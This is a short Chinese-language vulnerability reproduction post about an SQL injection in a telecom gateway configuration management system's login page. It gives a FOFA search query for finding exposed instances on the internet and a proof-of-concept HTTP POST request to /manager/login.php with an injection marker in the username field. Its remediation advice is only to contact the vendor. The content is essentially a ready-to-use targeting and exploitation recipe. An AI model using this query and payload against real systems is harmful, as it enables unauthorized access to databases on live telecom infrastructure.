【漏洞复现】电信网关配置管理系统SQL注入漏洞

Nx01 产品简介

        电信网关配置管理系统是一个用于管理和配置电信网络中网关设备的软件系统。它可以帮助网络管理员实现对网关设备的远程监控、配置、升级和故障排除等功能，从而确保网络的正常运行和高效性能。

Nx02 漏洞描述

        电信网关配置管理系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

Nx03 产品主页

fofa-query: body="img/dl.gif" && title="系统登录"

Nx04 漏洞复现

POC：

POST /manager/login.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 53
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

Name=admin*&Pass=admin

Nx05 修复建议

建议联系软件厂商进行处理。